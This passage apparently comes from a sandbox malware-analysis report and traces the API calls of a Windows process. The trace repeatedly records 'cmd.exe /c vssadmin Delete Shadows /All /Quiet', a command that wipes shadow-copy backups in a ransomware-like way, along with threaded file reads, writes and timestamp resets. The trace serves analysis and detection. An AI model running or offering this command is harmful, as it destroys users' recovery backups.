dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.389] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.389] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.390] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.390] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.390] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.390] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.390] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.390] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.390] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.390] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.390] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.390] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.390] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 Thread: id = 6 os_tid = 0xf8c Thread: id = 7 os_tid = 0xf90 [0072.120] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x270fc4c, lpCompletionKey=0x270fc5c, lpOverlapped=0x270fc58, dwMilliseconds=0xffffffff) Thread: id = 8 os_tid = 0xf94 [0072.120] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x280fc4c, lpCompletionKey=0x280fc5c, lpOverlapped=0x280fc58, dwMilliseconds=0xffffffff) Thread: id = 9 os_tid = 0xf98 [0072.120] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58) returned 1 [0095.793] WriteFile (in: hFile=0x3d0, lpBuffer=0x20ebe14*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebde0 | out: lpBuffer=0x20ebe14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebde0) returned 1 [0095.794] GetLastError () returned 0x3e5 [0095.794] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58) returned 1 [0095.798] SetFileTime (hFile=0x3d4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0095.798] CloseHandle (hObject=0x3d4) returned 1 [0096.248] free (_Block=0x3940048) [0096.248] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58) returned 1 [0096.254] memcpy (in: _Dst=0x41cfdc, _Src=0x290f9a0, _Size=0x2 | out: _Dst=0x41cfdc) returned 0x41cfdc [0096.254] memcpy (in: _Dst=0x41cfde, _Src=0x290f96c, _Size=0x1e | out: _Dst=0x41cfde) returned 0x41cfde [0096.254] memcpy (in: _Dst=0x41cfbc, _Src=0x290f98a, _Size=0x2 | out: _Dst=0x41cfbc) returned 0x41cfbc [0096.255] memcpy (in: _Dst=0x41cfbc, _Src=0x290fa50, _Size=0x20 | out: _Dst=0x41cfbc) returned 0x41cfbc [0096.255] memcpy (in: _Dst=0x290f9e8, _Src=0x290fa50, _Size=0x20 | out: _Dst=0x290f9e8) returned 0x290f9e8 [0096.255] memcpy (in: _Dst=0x290fa9c, _Src=0x290fa50, _Size=0x20 | out: _Dst=0x290fa9c) returned 0x290fa9c [0096.255] memcpy (in: _Dst=0x290fabc, _Src=0x290fc70, _Size=0x10 | out: _Dst=0x290fabc) returned 0x290fabc [0096.255] memcpy (in: _Dst=0x290f890, _Src=0x290fa9c, _Size=0x30 | out: _Dst=0x290f890) returned 0x290f890 [0096.255] memcpy (in: _Dst=0x290fde8, _Src=0x41d198, _Size=0x0 | out: _Dst=0x290fde8) returned 0x290fde8 [0096.255] memcpy (in: _Dst=0x206b898, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b898) returned 0x206b898 [0096.255] memcpy (in: _Dst=0x206b899, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b899) returned 0x206b899 [0096.255] memcpy (in: _Dst=0x206b89a, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b89a) returned 0x206b89a [0096.256] memcpy (in: _Dst=0x206b89b, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b89b) returned 0x206b89b [0096.256] memcpy (in: _Dst=0x206b89c, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b89c) returned 0x206b89c [0096.256] memcpy (in: _Dst=0x206b89d, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b89d) returned 0x206b89d [0096.256] memcpy (in: _Dst=0x206b89e, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b89e) returned 0x206b89e [0096.256] memcpy (in: _Dst=0x206b89f, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b89f) returned 0x206b89f [0096.256] memcpy (in: _Dst=0x206b8a0, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a0) returned 0x206b8a0 [0096.257] memcpy (in: _Dst=0x206b8a1, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a1) returned 0x206b8a1 [0096.257] memcpy (in: _Dst=0x206b8a2, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a2) returned 0x206b8a2 [0096.257] memcpy (in: _Dst=0x206b8a3, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a3) returned 0x206b8a3 [0096.257] memcpy (in: _Dst=0x206b8a4, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a4) returned 0x206b8a4 [0096.257] memcpy (in: _Dst=0x206b8a5, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a5) returned 0x206b8a5 [0096.257] memcpy (in: _Dst=0x206b8a6, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a6) returned 0x206b8a6 [0096.258] memcpy (in: _Dst=0x206b8a7, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a7) returned 0x206b8a7 [0096.258] memcpy (in: _Dst=0x206b8a8, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a8) returned 0x206b8a8 [0096.258] memcpy (in: _Dst=0x206b8a9, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8a9) returned 0x206b8a9 [0096.258] memcpy (in: _Dst=0x206b8aa, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8aa) returned 0x206b8aa [0096.258] memcpy (in: _Dst=0x206b8ab, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8ab) returned 0x206b8ab [0096.258] memcpy (in: _Dst=0x206b8ac, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8ac) returned 0x206b8ac [0096.258] memcpy (in: _Dst=0x206b8ad, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8ad) returned 0x206b8ad [0096.259] memcpy (in: _Dst=0x206b8ae, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8ae) returned 0x206b8ae [0096.259] memcpy (in: _Dst=0x206b8af, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8af) returned 0x206b8af [0096.259] memcpy (in: _Dst=0x206b8b0, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b0) returned 0x206b8b0 [0096.259] memcpy (in: _Dst=0x206b8b1, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b1) returned 0x206b8b1 [0096.259] memcpy (in: _Dst=0x206b8b2, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b2) returned 0x206b8b2 [0096.259] memcpy (in: _Dst=0x206b8b3, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b3) returned 0x206b8b3 [0096.260] memcpy (in: _Dst=0x206b8b4, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b4) returned 0x206b8b4 [0096.260] memcpy (in: _Dst=0x206b8b5, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b5) returned 0x206b8b5 [0096.260] memcpy (in: _Dst=0x206b8b6, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b6) returned 0x206b8b6 [0096.260] memcpy (in: _Dst=0x206b8b7, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b7) returned 0x206b8b7 [0096.260] memcpy (in: _Dst=0x206b8b8, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b8) returned 0x206b8b8 [0096.260] memcpy (in: _Dst=0x206b8b9, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8b9) returned 0x206b8b9 [0096.261] memcpy (in: _Dst=0x206b8ba, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8ba) returned 0x206b8ba [0096.261] memcpy (in: _Dst=0x206b8bb, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8bb) returned 0x206b8bb [0096.261] memcpy (in: _Dst=0x206b8bc, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8bc) returned 0x206b8bc [0096.261] memcpy (in: _Dst=0x206b8bd, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8bd) returned 0x206b8bd [0096.261] memcpy (in: _Dst=0x206b8be, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8be) returned 0x206b8be [0096.261] memcpy (in: _Dst=0x206b8bf, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8bf) returned 0x206b8bf [0096.262] memcpy (in: _Dst=0x206b8c0, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8c0) returned 0x206b8c0 [0096.262] memcpy (in: _Dst=0x206b8c1, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8c1) returned 0x206b8c1 [0096.262] memcpy (in: _Dst=0x206b8c2, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8c2) returned 0x206b8c2 [0096.262] memcpy (in: _Dst=0x206b8c3, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8c3) returned 0x206b8c3 [0096.262] memcpy (in: _Dst=0x206b8c4, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8c4) returned 0x206b8c4 [0096.263] memcpy (in: _Dst=0x206b8c5, _Src=0x290fbdc, _Size=0x1 | out: _Dst=0x206b8c5) returned 0x206b8c5 [0096.263] calloc (_Count=0x40, _Size=0x4) returned 0x53fd38 [0096.263] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0096.263] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd38, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0096.263] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0096.263] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0096.264] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58) returned 1 [0096.280] WriteFile (in: hFile=0x3c0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0096.281] GetLastError () returned 0x3e5 [0096.281] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58) returned 1 [0096.297] ReadFile (in: hFile=0x3d4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x984, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0096.298] GetLastError () returned 0x3e5 [0096.298] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58) returned 1 [0096.305] calloc (_Count=0x40, _Size=0x4) returned 0x53fd38 [0096.305] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0096.305] memcpy (in: _Dst=0x2062eb8, _Src=0x53fd38, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0096.306] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0096.306] calloc (_Count=0x82, _Size=0x4) returned 0x3981cc0 [0096.306] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x290fc4c, lpCompletionKey=0x290fc5c, lpOverlapped=0x290fc58, dwMilliseconds=0xffffffff) Thread: id = 10 os_tid = 0xf9c [0072.120] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0076.751] SetFileTime (hFile=0x3a8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.752] CloseHandle (hObject=0x3a8) returned 1 [0076.759] free (_Block=0x20ebb50) [0076.759] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0076.762] SetFileTime (hFile=0x3a0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.762] CloseHandle (hObject=0x3a0) returned 1 [0076.775] free (_Block=0x206b860) [0076.775] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.255] ReadFile (in: hFile=0x3b4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.255] GetLastError () returned 0x3e5 [0077.255] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.265] SetFileTime (hFile=0x3b4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.265] CloseHandle (hObject=0x3b4) returned 1 [0077.269] free (_Block=0x206b860) [0077.269] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.282] ReadFile (in: hFile=0x3b0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x69a5, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0077.462] GetLastError () returned 0x3e5 [0077.462] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.463] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.463] CloseHandle (hObject=0x3b0) returned 1 [0077.469] free (_Block=0x20abae0) [0077.471] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2a4fc4c, lpCompletionKey=0x2a4fc5c, lpOverlapped=0x2a4fc58) returned 1 [0077.534] memcpy (in: _Dst=0x41cfdc, _Src=0x2a4f9a0, _Size=0x2 | out: _Dst=0x41cfdc) returned 0x41cfdc [0077.534] memcpy (in: _Dst=0x41cfde, _Src=0x2a4f96c, _Size=0x1e | out: _Dst=0x41cfde) returned 0x41cfde [0077.534] memcpy (in: _Dst=0x41cfbc, _Src=0x2a4f98a, _Size=0x2 | out: _Dst=0x41cfbc) returned 0x41cfbc [0077.534] memcpy (in: _Dst=0x41cfbc, _Src=0x2a4fa50, _Size=0x20 | out: _Dst=0x41cfbc) returned 0x41cfbc [0077.535] memcpy (in: _Dst=0x2a4f9e8, _Src=0x2a4fa50, _Size=0x20 | out: _Dst=0x2a4f9e8) returned 0x2a4f9e8 [0077.535] memcpy (in: _Dst=0x2a4fa9c, _Src=0x2a4fa50, _Size=0x20 | out: _Dst=0x2a4fa9c) returned 0x2a4fa9c [0077.535] memcpy (in: _Dst=0x2a4fabc, _Src=0x2a4fc70, _Size=0x10 | out: _Dst=0x2a4fabc) returned 0x2a4fabc [0077.535] memcpy (in: _Dst=0x2a4f890, _Src=0x2a4fa9c, _Size=0x30 | out: _Dst=0x2a4f890) returned 0x2a4f890 [0077.535] memcpy (in: _Dst=0x2a4fde8, _Src=0x41d198, _Size=0x0 | out: _Dst=0x2a4fde8) returned 0x2a4fde8 [0077.535] memcpy (in: _Dst=0x206b896, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b896) returned 0x206b896 [0077.535] memcpy (in: _Dst=0x206b897, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b897) returned 0x206b897 [0077.535] memcpy (in: _Dst=0x206b898, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b898) returned 0x206b898 [0077.535] memcpy (in: _Dst=0x206b899, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b899) returned 0x206b899 [0077.536] memcpy (in: _Dst=0x206b89a, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b89a) returned 0x206b89a [0077.536] memcpy (in: _Dst=0x206b89b, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b89b) returned 0x206b89b [0077.536] memcpy (in: _Dst=0x206b89c, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b89c) returned 0x206b89c [0077.536] memcpy (in: _Dst=0x206b89d, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b89d) returned 0x206b89d [0077.536] memcpy (in: _Dst=0x206b89e, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b89e) returned 0x206b89e [0077.536] memcpy (in: _Dst=0x206b89f, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b89f) returned 0x206b89f [0077.537] memcpy (in: _Dst=0x206b8a0, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a0) returned 0x206b8a0 [0077.537] memcpy (in: _Dst=0x206b8a1, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a1) returned 0x206b8a1 [0077.537] memcpy (in: _Dst=0x206b8a2, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a2) returned 0x206b8a2 [0077.537] memcpy (in: _Dst=0x206b8a3, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a3) returned 0x206b8a3 [0077.537] memcpy (in: _Dst=0x206b8a4, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a4) returned 0x206b8a4 [0077.537] memcpy (in: _Dst=0x206b8a5, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a5) returned 0x206b8a5 [0077.537] memcpy (in: _Dst=0x206b8a6, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a6) returned 0x206b8a6 [0077.538] memcpy (in: _Dst=0x206b8a7, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a7) returned 0x206b8a7 [0077.538] memcpy (in: _Dst=0x206b8a8, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a8) returned 0x206b8a8 [0077.538] memcpy (in: _Dst=0x206b8a9, _Src=0x2a4fbdc, _Size=0x1 | out: _Dst=0x206b8a9) returned 0x206b8a9 [0077.538] memcpy (in: _Dst=0x206b8aa, _Src=0x2a4fbdc, _Size=0x1 | out: 